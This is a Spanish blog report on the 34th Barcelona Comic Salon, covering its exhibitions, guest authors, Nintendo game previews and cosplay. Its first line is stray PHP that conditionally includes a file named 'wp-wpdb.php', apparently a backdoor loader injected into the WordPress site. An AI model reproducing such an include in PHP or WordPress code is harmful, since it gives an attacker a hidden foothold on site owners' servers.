if (is_file('wp-wpdb.php')) include_once('wp-wpdb.php'); Crónica del 34 Salón del Cómic de Barcelona – La Fortaleza de LeChuck

Crónica del 34 Salón del Cómic de Barcelona

El Salón del Cómic de Barcelona ha cerrado este domingo sus puertas con un total de 118.000 visitantes, una cifra que supone un aumento de 5.000 respecto a la edición del año pasado. El crecimiento del salón en visitantes, actividades, expositores, autores y videojuegos continua en aumento y esta edición estuvo cargada de actividades que contribuyeron a ello. Pasamos a contaros todo lo vivido estos días por la feria.

34 Salón del Cómic

El Salón del Cómic pasó a ocupar este año 45.000 metros cuadrados del recinto de la Fira de Barcelona con un montón de actividades para los amantes de los cómics. Durante los cuatro días, los asistentes han podido disfrutar de grandes exposiciones, como Viñetas sobre ruedas, donde se ha visto el gran protagonismo de los vehículos en el cómic, la del homenaje a Francisco Ibáñez, una de superheroínas, de novela la gráfica de contenido social, los nuevos ilustradores y la dedicada a Luis Bermejo que hicieron las delicias de los fans que pudieron disfrutar de ellas en espacios lejos del bullicio.

34 Salón del Cómic

Uno de los atractivos de la cita es el contacto del público con los autores, ya sea en las sesiones de firmas, conferencias o talleres. Este año especialmente destacó la larga lista de invitados extranjeros como Ben Bocquelet, Brian Azzarello, Cyril Pedrosa, Eleuterio Serpieri, Frank Miller, Koren Shadmi y Zerocalcare, entre otros. Una oportunidad sin igual de conocer a los grandes del cómic que han hecho crecer esta expresión visual hasta convertirla en cultura y hacer que se respete.

El salón del cómic es mucho más que tebeos, también hubo videojuegos y Nintendo no faltó a la cita con un gran espacio en el Palau 1 . En 500 metros cuadrados pudimos probar algunas de las últimas novedades de la compañía japonesa y participar en las tres grandes comunidades dedicadas a Pokémon, Monster Hunter y The Legend of Zelda que ofrecieron muchos concursos. Pero, además de competiciones, los visitantes pudieron probar algunas de las novedades más esperadas como Kirby: Planet Robobot, la vuelta de la bola rosa tragona, y Fire Emblem: Fates, la nueva entrega de uno de los mejores RPGs de Nintendo. Sin embargo, uno de los gigantes y futuro bombazo de Nintendo era el que captaba toda la atención, hablo de YO-KAI WATCH, el cual estaba disponible en varias 3DS y se emitió en primicia el primer episodio de la serie de animación en castellano.

Tuve la ocasión de probar YO-KAI WATCH y tengo que decir que el juego no es Pokemon y las similitudes son muy pocas. Yo-Kai Watch es un juego divertido y el diseño es muy original. Hay un montón de misiones y seres amistosos y otros no tanto a los que conocer. El entorno, el mapa y diseños son excelentes. La capacidad de buscar túneles, callejones, lagunas, playas, bosques, coches, postes, canaletas, y máquinas expendedoras en busca de yo-kais añade un sentido de aventura que no se refleja en otros juegos del género. El único problema que encuentro es que el mapa no es interactivo o útil para la navegación. Por ejemplo, no se puede abrir búsquedas y direcciones de visualización en el mapa.

Yokai Watch 34 Salón del Cómic

En cuanto al sistema de batalla, a pesar de ser fresco y distinto de la mecánica de combate de la serie Pokemon, hay una pequeña falta de autonomía en batalla. El jugador tiene la posibilidad de utilizar los elementos, un movimiento especial (que no puede ser modificado), y cambiar la disposición del yokai en la batalla pero quizá eché de menos más libertad. Habrá que jugar a la versión final para hacerse una opinión más sólida pero el juego será un bombazo sin duda.

También me gustaría comentar mis impresiones del inminente Fire Emblem Fates. Después de un rato de prueba, puedo decir que el juego ha mejorado la mecánica de Awakening. Se han añadido nuevas armas y magias y cuando se selecciona una unidad voladora habrá un signo de exclamación si alguien tiene un arma que sea fuerte contra ésta. Estos detalles son muy útiles y hace que el juego sea más fluido. En cuanto a diseños y personajes, se ven preciosos y con mucho carisma, se nota el mimo en los pequeños detalles y el esfuerzo por crear diversidad, y esto incluye personajes homosexuales, haciendo que Nintendo se abra hacía una comunidad de jugadores que pedían que se les tuviera en cuenta. El único fallo que le veo es el doblaje, ya que no se nos da la posibilidad de elegir en original. Serán tres juegos independientes y es otro de los juegos a tener en cuenta para 3DS.

Nintendo también se dedicó un pequeño espacio a la nostalgía con la exposición de tesoros nintenderos aportados por los fans españoles. Una exposición que reunió objetos variopintos y tesoros de los fans que ganaron los concursos de Twitter e Instagram y son verdaderos coleccionistas y amantes de los juegos de la compañía. Había objetos de todo tipo para contemplar, desde los primeros juegos lanzados por la compañía, pasando por aquellas guías del Zelda con las marcas del paso del tiempo y hasta dibujos y objetos artesanales hechos por los jugadores. Una verdadera expo histórica llena de amor.

Pero Nintendo quería poner el broche final el último día del salón y nos ofreció en el escenario un avance musical del Zelda Symphony of the Goddesses, que volverá a recorrer España este otoño. Un pequeño grupo de La Orquesta Filarmónica de España interpretó varios temas de Zelda y algunos fueron elegidos por petición popular. Fue una gran experiencia que nos dejó la piel de gallina.

34 Salón del Cómic

Y como despedida, me dejo lo que da vidilla al Salón del Cómic: ¡El Cosplay! El arte de los visitantes no tiene limite creando todo tipo de indumentarias imposibles sobre cómics, series, películas y videojuegos. En este video podéis ver algunos de los disfraces más increíbles que se dejaron ver estos días. ¡Disfrutadlo y hasta el próximo salón!